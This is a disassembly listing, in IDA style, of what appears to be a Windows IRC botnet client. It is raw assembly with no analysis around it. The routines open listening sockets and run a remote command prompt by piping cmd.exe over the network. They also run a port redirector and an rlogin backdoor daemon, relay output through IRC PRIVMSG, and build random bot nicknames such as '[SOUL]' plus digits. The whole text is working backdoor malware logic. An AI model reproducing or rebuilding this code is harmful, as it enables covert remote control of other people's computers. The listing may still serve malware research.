push 6
push esi
xor ebx, ebx
push 2
mov [ebp+var_E], ax
mov [ebp+var_C], ebx
mov [ebp+arg_0], 10h
call dword_4334A0 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_40DB1B
mov eax, [ebp+var_3C]
imul eax, 234h
push esi
push 401h
push ebx
push edi
mov dword_434344[eax], edi
call dword_43352C ; WSAAsyncSelect
push 10h
lea eax, [ebp+var_10]
push eax
push edi
call dword_433578 ; bind
test eax, eax
jnz loc_40DB1B
push 0Ah
push edi
call dword_4335C0 ; listen
test eax, eax
jnz loc_40DB1B
loc_40DA62: ; CODE XREF: sub_40D9BC+BA�j
; sub_40D9BC+15A�j
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_24]
push eax
push edi
call dword_433464 ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40DA62
push [ebp+var_3C]
movzx eax, [ebp+var_22]
push eax
push [ebp+var_20]
mov [ebp+var_148], esi
mov [ebp+var_2C], ebx
call dword_433520 ; inet_ntoa
push eax
lea eax, [ebp+var_34C]
push offset aRedirectClie_0 ; "[REDIRECT]: Client connection from IP: "...
push eax
call sub_412BB5
push esi
lea eax, [ebp+var_34C]
push 11h
push eax
call sub_410EEA
mov ecx, [ebp+var_3C]
mov [ebp+var_38], eax
imul eax, 234h
add esp, 20h
mov dword_43433C[eax], ecx
lea eax, [ebp+var_14]
push eax
push ebx
lea eax, [ebp+var_14C]
push eax
push offset sub_40D7DF
push ebx
push ebx
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, ebx
mov dword_43434C[ecx], eax
jnz short loc_40DB11
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aRedirectFail_1 ; "[REDIRECT]: Failed to start client thre"...
call sub_401CA7
pop ecx
pop ecx
jmp short loc_40DB1E
; ---------------------------------------------------------------------------
loc_40DB09: ; CODE XREF: sub_40D9BC+158�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40DB11: ; CODE XREF: sub_40D9BC+136�j
cmp [ebp+var_2C], ebx
jz short loc_40DB09
jmp loc_40DA62
; ---------------------------------------------------------------------------
loc_40DB1B: ; CODE XREF: sub_40D9BC+5D�j
; sub_40D9BC+8F�j ...
mov esi, [ebp+arg_0]
loc_40DB1E: ; CODE XREF: sub_40D9BC+14B�j
push esi
call dword_4335AC ; closesocket
push edi
call dword_4335AC ; closesocket
push [ebp+var_3C]
call sub_4111AE
pop ecx
push ebx
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_40D9BC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40DB3D proc near ; CODE XREF: sub_40DB6D+30�p
; sub_40DBAB+85�p ...
mov eax, dword_479BCC
cmp eax, 0FFFFFFFFh
push esi
mov esi, ds:dword_41F034
jz short loc_40DB51
push eax
call esi ; CloseHandle
loc_40DB51: ; CODE XREF: sub_40DB3D+F�j
mov eax, dword_479BC8
cmp eax, 0FFFFFFFFh
jz short loc_40DB5E
push eax
call esi ; CloseHandle
loc_40DB5E: ; CODE XREF: sub_40DB3D+1C�j
mov eax, dword_479C04
cmp eax, 0FFFFFFFFh
jz short loc_40DB6B
push eax
call esi ; CloseHandle
loc_40DB6B: ; CODE XREF: sub_40DB3D+29�j
pop esi
retn
sub_40DB3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DB6D proc near ; CODE XREF: sub_4078FA+34AE�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea edx, [eax+1]
loc_40DB77: ; CODE XREF: sub_40DB6D+F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40DB77
push 0
lea ecx, [ebp+var_4]
push ecx
sub eax, edx
push eax
push [ebp+arg_0]
mov [ebp+var_4], eax
push dword_479BC0
call ds:dword_41F038 ; WriteFile
test eax, eax
jnz short loc_40DBA6
call sub_40DB3D
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40DBA6: ; CODE XREF: sub_40DB6D+2E�j
xor eax, eax
inc eax
leave
retn
sub_40DB6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DBAB proc near ; CODE XREF: sub_40DC39+D9�p
; sub_40DC39+11F�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
mov esi, [ebp+arg_4]
xor ecx, ecx
push edi
inc ecx
mov edi, 41FA76h
xor eax, eax
repe cmpsb
pop edi
pop esi
jz short loc_40DBF0
push 0FAh
call ds:dword_41F000 ; Sleep
push [ebp+arg_8]
lea eax, [ebp+var_200]
push [ebp+arg_4]
push offset aPrivmsgSS ; "PRIVMSG %s :%s\r"
push eax
call sub_412BB5
add esp, 10h
jmp short loc_40DC07
; ---------------------------------------------------------------------------
loc_40DBF0: ; CODE XREF: sub_40DBAB+1C�j
push [ebp+arg_8]
lea eax, [ebp+var_200]
push offset aS_1 ; "%s"
push eax
call sub_412BB5
add esp, 0Ch
loc_40DC07: ; CODE XREF: sub_40DBAB+43�j
lea eax, [ebp+var_200]
lea edx, [eax+1]
loc_40DC10: ; CODE XREF: sub_40DBAB+6A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40DC10
push 0
sub eax, edx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_433534 ; send
test eax, eax
jg short loc_40DC35
call sub_40DB3D
loc_40DC35: ; CODE XREF: sub_40DBAB+83�j
xor eax, eax
leave
retn
sub_40DBAB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DC39 proc near ; DATA XREF: sub_40DDC6+16A�o
var_20C = byte ptr -20Ch
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
push esi
push edi
xor eax, eax
mov ebx, 80h
mov ecx, ebx
lea edi, [ebp+var_20C]
rep stosd
xor edi, edi
push edi
push edi
lea eax, [ebp+var_4]
push eax
mov esi, 200h
push esi
lea eax, [ebp+var_20C]
push eax
push dword_479BCC
call ds:dword_41F0E4 ; PeekNamedPipe
test eax, eax
jz loc_40DD48
jmp short loc_40DC83
; ---------------------------------------------------------------------------
loc_40DC81: ; CODE XREF: sub_40DC39+109�j
xor edi, edi
loc_40DC83: ; CODE XREF: sub_40DC39+46�j
cmp [ebp+var_4], edi
jnz short loc_40DCB3
lea eax, [ebp+var_8]
push eax
push dword_479C04
call ds:dword_41F0E0 ; GetExitCodeProcess
test eax, eax
jz short loc_40DCA9
cmp [ebp+var_8], 103h
jnz loc_40DD75
loc_40DCA9: ; CODE XREF: sub_40DC39+61�j
push 0Ah
call ds:dword_41F000 ; Sleep
jmp short loc_40DD1A
; ---------------------------------------------------------------------------
loc_40DCB3: ; CODE XREF: sub_40DC39+4D�j
xor eax, eax
cmp [ebp+var_4], edi
jbe short loc_40DCCE
loc_40DCBA: ; CODE XREF: sub_40DC39+93�j
cmp [ebp+eax+var_20C], 0Ah
jz loc_40DD6C
inc eax
cmp eax, [ebp+var_4]
jb short loc_40DCBA
loc_40DCCE: ; CODE XREF: sub_40DC39+7F�j
mov [ebp+var_4], esi
loc_40DCD1: ; CODE XREF: sub_40DC39+137�j
xor eax, eax
push eax
mov ecx, ebx
lea edi, [ebp+var_20C]
rep stosd
lea eax, [ebp+var_C]
push eax
push [ebp+var_4]
lea eax, [ebp+var_20C]
push eax
push dword_479BCC
call ds:dword_41F058 ; ReadFile
test eax, eax
jz loc_40DD9D
lea eax, [ebp+var_20C]
push eax
push offset dword_479BD0
push dword_479BC4
call sub_40DBAB
add esp, 0Ch
loc_40DD1A: ; CODE XREF: sub_40DC39+78�j
xor eax, eax
push eax
push eax
mov ecx, ebx
lea edi, [ebp+var_20C]
rep stosd
lea eax, [ebp+var_4]
push eax
push esi
lea eax, [ebp+var_20C]
push eax
push dword_479BCC
call ds:dword_41F0E4 ; PeekNamedPipe
test eax, eax
jnz loc_40DC81
loc_40DD48: ; CODE XREF: sub_40DC39+40�j
push offset aCmdCouldNotRea ; "[CMD]: Could not read data from procces"...
push offset dword_479BD0
push dword_479BC4
call sub_40DBAB
push [ebp+arg_0]
call sub_4111AE
add esp, 10h
push 1
jmp short loc_40DDBF
; ---------------------------------------------------------------------------
loc_40DD6C: ; CODE XREF: sub_40DC39+89�j
inc eax
mov [ebp+var_4], eax
jmp loc_40DCD1
; ---------------------------------------------------------------------------
loc_40DD75: ; CODE XREF: sub_40DC39+6A�j
call sub_40DB3D
push offset aCmdProccessHas ; "[CMD]: Proccess has terminated.\r\n"
push offset dword_479BD0
push dword_479BC4
call sub_40DBAB
push [ebp+arg_0]
call sub_4111AE
add esp, 10h
push edi
jmp short loc_40DDBF
; ---------------------------------------------------------------------------
loc_40DD9D: ; CODE XREF: sub_40DC39+C1�j
push offset aCmdCouldNotR_0 ; "[CMD]: Could not read data from procces"...
push offset dword_479BD0
push dword_479BC4
call sub_40DBAB
push [ebp+arg_0]
call sub_4111AE
add esp, 10h
push 0
loc_40DDBF: ; CODE XREF: sub_40DC39+131�j
; sub_40DC39+162�j
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_40DC39 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DDC6 proc near ; CODE XREF: sub_4078FA+421C�p
var_378 = byte ptr -378h
var_178 = byte ptr -178h
var_74 = dword ptr -74h
var_48 = dword ptr -48h
var_44 = word ptr -44h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 378h
push esi
call sub_40DB3D
xor esi, esi
push esi
lea eax, [ebp+var_178]
push eax
push 104h
push esi
push offset aCmd_exe ; "cmd.exe"
push esi
call dword_4334C0 ; SearchPathA
test eax, eax
jnz short loc_40DDFD
or eax, 0FFFFFFFFh
jmp loc_40DF72
; ---------------------------------------------------------------------------
loc_40DDFD: ; CODE XREF: sub_40DDC6+2D�j
push ebx
push edi
mov edi, ds:dword_41F0EC
push esi
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_C]
push eax
xor ebx, ebx
lea eax, [ebp+var_10]
inc ebx
push eax
mov [ebp+var_1C], 0Ch
mov [ebp+var_14], ebx
mov [ebp+var_18], esi
call edi ; CreatePipe
test eax, eax
jnz short loc_40DE30
loc_40DE28: ; CODE XREF: sub_40DDC6+7B�j
; sub_40DDC6+9D�j ...
or eax, 0FFFFFFFFh
jmp loc_40DF70
; ---------------------------------------------------------------------------
loc_40DE30: ; CODE XREF: sub_40DDC6+60�j
push esi
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
call edi ; CreatePipe
test eax, eax
jz short loc_40DE28
mov edi, ds:dword_41F0B4
push 3
push esi
push esi
push offset dword_479BC0
call edi ; GetCurrentProcess
push eax
push [ebp+var_8]
call edi ; GetCurrentProcess
push eax
call ds:dword_41F0E8 ; DuplicateHandle
test eax, eax
jz short loc_40DE28
xor eax, eax
lea edi, [ebp+var_2C]
stosd
stosd
stosd
push 11h
pop ecx
stosd
xor eax, eax
lea edi, [ebp+var_74]
rep stosd
mov eax, [ebp+var_4]
mov [ebp+var_3C], eax
mov eax, [ebp+var_C]
mov [ebp+var_38], eax
mov [ebp+var_34], eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_74]
push eax
push esi
push esi
push esi
push ebx
push esi
push esi
mov ebx, 41FA76h
push ebx
lea eax, [ebp+var_178]
push eax
mov [ebp+var_74], 44h
mov [ebp+var_48], 101h
mov [ebp+var_44], si
call ds:dword_41F030 ; CreateProcessA
test eax, eax
jz loc_40DE28
push [ebp+var_4]
mov edi, ds:dword_41F034
call edi ; CloseHandle
mov eax, [ebp+var_10]
push [ebp+var_28]
mov dword_479BCC, eax
mov eax, [ebp+var_8]
mov dword_479BC8, eax
mov eax, [ebp+var_2C]
mov dword_479C04, eax
call edi ; CloseHandle
cmp [ebp+arg_4], esi
mov eax, [ebp+arg_0]
mov dword_479BC4, eax
jz short loc_40DEFC
push [ebp+arg_4]
jmp short loc_40DEFD
; ---------------------------------------------------------------------------
loc_40DEFC: ; CODE XREF: sub_40DDC6+12F�j
push ebx
loc_40DEFD: ; CODE XREF: sub_40DDC6+134�j
push offset dword_479BD0
call sub_412BB5
pop ecx
pop ecx
push esi
push 8
push offset aCmdRemoteComma ; "[CMD]: Remote Command Prompt"
call sub_410EEA
mov ecx, [ebp+var_24]
mov edi, eax
imul edi, 234h
add esp, 0Ch
mov dword_434340[edi], ecx
lea ecx, [ebp+var_30]
push ecx
push esi
push eax
push offset sub_40DC39
push esi
push esi
call ds:dword_41F00C ; CreateThread
cmp eax, esi
mov dword_43434C[edi], eax
jnz short loc_40DF6E
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_378]
push offset aCmdFailedToSta ; "[CMD]: Failed to start IO thread, error"...
push eax
call sub_412BB5
lea eax, [ebp+var_378]
push eax
call sub_401C33
add esp, 10h
loc_40DF6E: ; CODE XREF: sub_40DDC6+17F�j
xor eax, eax
loc_40DF70: ; CODE XREF: sub_40DDC6+65�j
pop edi
pop ebx
loc_40DF72: ; CODE XREF: sub_40DDC6+32�j
pop esi
leave
retn
sub_40DDC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DF75 proc near ; CODE XREF: sub_40E00D+A6�p
; sub_40E00D+B6�p ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
mov esi, eax
loc_40DF7C: ; CODE XREF: sub_40DF75+2A�j
push 0
push 1
lea eax, [ebp+var_1]
push eax
push [ebp+arg_0]
call dword_433414 ; recv
cmp eax, 1
jnz short loc_40DFB2
mov al, [ebp+var_1]
mov [esi], al
inc esi
dec [ebp+arg_4]
jz short loc_40DFA7
test al, al
jnz short loc_40DF7C
xor eax, eax
inc eax
loc_40DFA4: ; CODE XREF: sub_40DF75+3F�j
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_40DFA7: ; CODE XREF: sub_40DF75+26�j
push offset aRlogindProtoco ; "[RLOGIND]: Protocol string too long."
call sub_401CA7
pop ecx
loc_40DFB2: ; CODE XREF: sub_40DF75+1B�j
xor eax, eax
jmp short loc_40DFA4
sub_40DF75 endp
; =============== S U B R O U T I N E =======================================
sub_40DFB6 proc near ; DATA XREF: sub_40E219+5A�o
arg_0 = dword ptr 4
xor eax, eax
cmp [esp+arg_0], eax
setz al
retn
sub_40DFB6 endp
; =============== S U B R O U T I N E =======================================
sub_40DFC0 proc near ; CODE XREF: sub_40E00D+175�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_40DFC5: ; CODE XREF: sub_40DFC0+21�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_40DFE7
test cl, cl
jz short loc_40DFE3
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_40DFE7
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_40DFC5
loc_40DFE3: ; CODE XREF: sub_40DFC0+F�j
xor eax, eax
jmp short loc_40DFEC
; ---------------------------------------------------------------------------
loc_40DFE7: ; CODE XREF: sub_40DFC0+B�j
; sub_40DFC0+19�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40DFEC: ; CODE XREF: sub_40DFC0+25�j
test eax, eax
pop esi
jz short loc_40E009
push [esp+arg_4]
push [esp+4+arg_0]
push offset aRlogindLoginRe ; "[RLOGIND]: Login rejected, Remote user:"...
call sub_401CA7
add esp, 0Ch
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40E009: ; CODE XREF: sub_40DFC0+2F�j
xor eax, eax
inc eax
retn
sub_40DFC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40E00D proc near ; DATA XREF: sub_40E219+19F�o
var_3D4 = byte ptr -3D4h
var_350 = byte ptr -350h
var_208 = dword ptr -208h
var_1F4 = dword ptr -1F4h
var_1F0 = dword ptr -1F0h
var_F0 = byte ptr -0F0h
var_B0 = byte ptr -0B0h
var_4C = byte ptr -4Ch
var_3C = byte ptr -3Ch
var_2C = byte ptr -2Ch
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 3D4h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 78h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_3D4]
rep movsd
mov esi, [ebp+74h+var_208]
mov [ebp+74h+arg_0], esi
imul esi, 234h
xor edi, edi
inc edi
mov [eax+1DCh], edi
mov eax, dword_434344[esi]
mov [ebp+74h+var_1F0], eax
xor ebx, ebx
lea eax, [ebp+74h+var_C]
push eax
push ebx
push ebx
lea eax, [ebp+74h+var_1F4]
push eax
push ebx
mov [ebp+74h+var_C], 1Eh
mov [ebp+74h+var_8], ebx
mov [ebp+74h+var_1F4], edi
call dword_433544 ; select
test eax, eax
jnz short loc_40E096
push dword_434344[esi]
call dword_4335AC ; closesocket
push [ebp+74h+var_208]
loc_40E08B: ; CODE XREF: sub_40E00D+1A2�j
call sub_4111AE
pop ecx
jmp loc_40E211
; ---------------------------------------------------------------------------
loc_40E096: ; CODE XREF: sub_40E00D+6A�j
push ebx
push edi
lea eax, [ebp+74h+var_3C]
push eax
push dword_434344[esi]
call dword_433414 ; recv
push 10h
push dword_434344[esi]
lea eax, [ebp+74h+var_2C]
call sub_40DF75
push 10h
push dword_434344[esi]
lea eax, [ebp+74h+var_4C]
call sub_40DF75
push 40h
push dword_434344[esi]
lea eax, [ebp+74h+var_F0]
call sub_40DF75
add esp, 18h
lea eax, [ebp+74h+var_4]
push eax
lea eax, [ebp+74h+var_1C]
push eax
push dword_434344[esi]
mov [ebp+74h+var_4], 10h
call dword_4334E0 ; getpeername
test eax, eax
jz short loc_40E11E
call dword_433558 ; WSAGetLastError
push eax
push offset aRlogindErrorGe ; "[RLOGIND]: Error: getpeername(): <%d>."
call sub_401CA7
push [ebp+74h+var_208]
call sub_4111AE
add esp, 0Ch
jmp loc_40E211
; ---------------------------------------------------------------------------
loc_40E11E: ; CODE XREF: sub_40E00D+EB�j
push 2
push 4
lea eax, [ebp+74h+var_18]
push eax
call dword_433590 ; gethostbyaddr
cmp eax, ebx
jnz short loc_40E147
push [ebp+74h+var_18]
call dword_433520 ; inet_ntoa
push eax
lea eax, [ebp+74h+var_B0]
push eax
call sub_412BB5
pop ecx
pop ecx
jmp short loc_40E156
; ---------------------------------------------------------------------------
loc_40E147: ; CODE XREF: sub_40E00D+121�j
mov ecx, [eax]
lea edx, [ebp+74h+var_B0]
loc_40E14C: ; CODE XREF: sub_40E00D+147�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
cmp al, bl
jnz short loc_40E14C
loc_40E156: ; CODE XREF: sub_40E00D+138�j
push ebx
push edi
push 41FA76h
push dword_434344[esi]
call dword_433534 ; send
cmp dword_479C0C, ebx
jnz short loc_40E1B4
push [ebp+74h+var_18]
lea eax, [ebp+74h+var_B0]
push eax
lea eax, [ebp+74h+var_2C]
push eax
lea eax, [ebp+74h+var_350]
call sub_40DFC0
add esp, 0Ch
test eax, eax
jnz short loc_40E1B4
push ebx
push 13h
push offset aPermissionDeni ; "Permission denied\n"
lea esi, dword_434344[esi]
push dword ptr [esi]
call dword_433534 ; send
push dword ptr [esi]
call dword_4335AC ; closesocket
push [ebp+74h+arg_0]
jmp loc_40E08B
; ---------------------------------------------------------------------------
loc_40E1B4: ; CODE XREF: sub_40E00D+162�j
; sub_40E00D+17F�j
lea eax, [ebp+74h+var_B0]
push eax
lea eax, [ebp+74h+var_2C]
push eax
push offset aRlogindUserLog ; "[RLOGIND]: User logged in: <%s@%s>."
call sub_401CA7
push [ebp+74h+arg_0]
call sub_40F3F5
add esp, 10h
test eax, eax
jnz short loc_40E1F4
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aRlogindErrorSe ; "[RLOGIND]: Error: SessionRun(): <%d>."
call sub_401CA7
push [ebp+74h+arg_0]
call sub_4111AE
add esp, 0Ch
push edi
jmp short loc_40E212
; ---------------------------------------------------------------------------
loc_40E1F4: ; CODE XREF: sub_40E00D+1C6�j
lea eax, [ebp+74h+var_B0]
push eax
lea eax, [ebp+74h+var_2C]
push eax
push offset aRlogindUserL_0 ; "[RLOGIND]: User logged out: <%s@%s>."
call sub_401CA7
push [ebp+74h+arg_0]
call sub_4111AE
add esp, 10h
loc_40E211: ; CODE XREF: sub_40E00D+84�j
; sub_40E00D+10C�j
push ebx
loc_40E212: ; CODE XREF: sub_40E00D+1E5�j
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_40E00D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E219 proc near ; DATA XREF: sub_4078FA+40DB�o
var_5A8 = byte ptr -5A8h
var_418 = byte ptr -418h
var_218 = dword ptr -218h
var_214 = byte ptr -214h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5A8h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 78h
pop ecx
mov esi, eax
lea edi, [ebp+var_218]
rep movsd
xor esi, esi
inc esi
mov [eax+1DCh], esi
lea eax, [ebp+var_5A8]
push eax
push 202h
call dword_4334B0 ; WSAStartup
xor ebx, ebx
cmp eax, ebx
jz short loc_40E272
push eax
push offset aRlogindErrorWs ; "[RLOGIND]: Error: WSAStartup(): <%d>."
call sub_401CA7
push [ebp+var_50]
call sub_4111AE
add esp, 0Ch
loc_40E26C: ; CODE XREF: sub_40E219+8B�j
push esi
jmp loc_40E48E
; ---------------------------------------------------------------------------
loc_40E272: ; CODE XREF: sub_40E219+3B�j
push esi
push offset sub_40DFB6
call ds:dword_41F0F0 ; SetConsoleCtrlHandler
test eax, eax
jnz short loc_40E2A6
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_0 ; "[RLOGIND]: Failed to install control-C "...
call sub_401CA7
pop ecx
pop ecx
call dword_4335B8 ; WSACleanup
push [ebp+var_50]
call sub_4111AE
pop ecx
jmp short loc_40E26C
; ---------------------------------------------------------------------------
loc_40E2A6: ; CODE XREF: sub_40E219+67�j
push [ebp+var_54]
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
stosd
mov [ebp+var_24], 2
call dword_4335EC ; ntohs
push 6
push esi
push 2
mov [ebp+var_22], ax
mov [ebp+var_20], ebx
call dword_4334A0 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_40E41E
mov ecx, [ebp+var_50]
imul ecx, 234h
push 10h
pop edi
mov dword_434344[ecx], eax
push edi
lea ecx, [ebp+var_24]
push ecx
push eax
call dword_433578 ; bind
test eax, eax
jnz loc_40E41E
push 7FFFFFFFh
push [ebp+arg_0]
call dword_4335C0 ; listen
test eax, eax
jnz loc_40E41E
push offset aRlogindReadyAn ; "[RLOGIND]: Ready and waiting for incomi"...
mov [ebp+var_14], 0Ch
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
call sub_401C33
pop ecx
mov [ebp+var_8], esi
jmp loc_40E3FD
; ---------------------------------------------------------------------------
loc_40E338: ; CODE XREF: sub_40E219+1FD�j
push [ebp+var_8]
lea eax, [ebp+var_8]
push eax
push 8
push 0FFFFh
push esi
call dword_4334BC ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_40E3FD
push [ebp+var_50]
movzx eax, [ebp+var_32]
push eax
push [ebp+var_30]
mov [ebp+var_3C], ebx
call dword_433520 ; inet_ntoa
push eax
lea eax, [ebp+var_418]
push offset aRlogindClientC ; "[RLOGIND]: Client connection from IP: %"...
push eax
call sub_412BB5
lea eax, [ebp+var_418]
push eax
call sub_401C33
push esi
lea eax, [ebp+var_418]
push 7
push eax
call sub_410EEA
mov ecx, [ebp+var_50]
mov [ebp+var_4C], eax
imul eax, 234h
add esp, 24h
mov dword_43433C[eax], ecx
lea eax, [ebp+var_38]
push eax
push ebx
lea eax, [ebp+var_218]
push eax
push offset sub_40E00D
push ebx
lea eax, [ebp+var_14]
push eax
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_4C]
imul ecx, 234h
cmp eax, ebx
mov dword_43434C[ecx], eax
jnz short loc_40E3F8
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_1 ; "[RLOGIND]: Failed to start client threa"...
call sub_401CA7
pop ecx
pop ecx
jmp short loc_40E421
; ---------------------------------------------------------------------------
loc_40E3F0: ; CODE XREF: sub_40E219+1E2�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40E3F8: ; CODE XREF: sub_40E219+1C0�j
cmp [ebp+var_3C], ebx
jz short loc_40E3F0
loc_40E3FD: ; CODE XREF: sub_40E219+11A�j
; sub_40E219+137�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_34]
push eax
push [ebp+arg_0]
mov [ebp+var_4], edi
call dword_433464 ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz loc_40E338
jmp short loc_40E421
; ---------------------------------------------------------------------------
loc_40E41E: ; CODE XREF: sub_40E219+BD�j
; sub_40E219+E3�j ...
mov esi, [ebp+arg_0]
loc_40E421: ; CODE XREF: sub_40E219+1D5�j
; sub_40E219+203�j
call dword_433558 ; WSAGetLastError
push eax
lea eax, [ebp+var_418]
push offset aRlogindError_0 ; "[RLOGIND]: Error: server failed, return"...
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_40], ebx
jnz short loc_40E461
push ebx
push [ebp+var_44]
lea eax, [ebp+var_418]
push eax
lea eax, [ebp+var_214]
push eax
push [ebp+var_218]
call sub_4045DD
add esp, 14h
loc_40E461: ; CODE XREF: sub_40E219+226�j
lea eax, [ebp+var_418]
push eax
call sub_401C33
pop ecx
push esi
call dword_4335AC ; closesocket
push [ebp+arg_0]
call dword_4335AC ; closesocket
call dword_4335B8 ; WSACleanup
push [ebp+var_50]
call sub_4111AE
pop ecx
push ebx
loc_40E48E: ; CODE XREF: sub_40E219+54�j
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_40E219 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40E495 proc near ; CODE XREF: sub_40E7B0+6C�p
; DATA XREF: .data:off_42B298�o
var_C = dword ptr -0Ch
arg_0 = dword ptr 4
push esi
push edi
call ds:dword_41F004 ; GetTickCount
push eax
call sub_412D64
mov edi, [esp+0Ch+arg_0]
mov [esp+0Ch+var_C], offset aSoul ; "[SOUL]"
push offset aS_1 ; "%s"
push 1Ch
push edi
call sub_412E0D
xor esi, esi
add esp, 10h
cmp dword_42AE60, esi
jle short loc_40E4EE
loc_40E4C8: ; CODE XREF: sub_40E495+57�j
call sub_412D71
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_412E0D
add esp, 14h
inc esi
cmp esi, dword_42AE60
jl short loc_40E4C8
loc_40E4EE: ; CODE XREF: sub_40E495+31�j
mov eax, edi
pop edi
pop esi
retn
sub_40E495 endp
; =============== S U B R O U T I N E =======================================
sub_40E4F3 proc near ; CODE XREF: sub_4078FA+2C3B�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
call ds:dword_41F004 ; GetTickCount
push eax
call sub_412D64
pop ecx
call sub_412D71
push 3
cdq
pop ecx
idiv ecx
mov ebx, [esp+0Ch+arg_0]
xor edi, edi
mov esi, edx
add esi, dword_42AE60
test esi, esi
jle short loc_40E536
loc_40E520: ; CODE XREF: sub_40E4F3+41�j
call sub_412D71
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [edi+ebx], dl
inc edi
cmp edi, esi
jl short loc_40E520
loc_40E536: ; CODE XREF: sub_40E4F3+2B�j
and byte ptr [edi+ebx], 0
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_40E4F3 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov dword ptr [ebp-4], 100h
call ds:dword_41F004 ; GetTickCount
push eax
call sub_412D64
pop ecx
lea eax, [ebp-4]
push eax
mov esi, offset aPc ; "PC"
push esi
call ds:dword_41F0B0 ; GetComputerNameA
mov edi, [ebp+8]
push esi
push 1Ch
push edi
call sub_412E0D
xor esi, esi
add esp, 0Ch
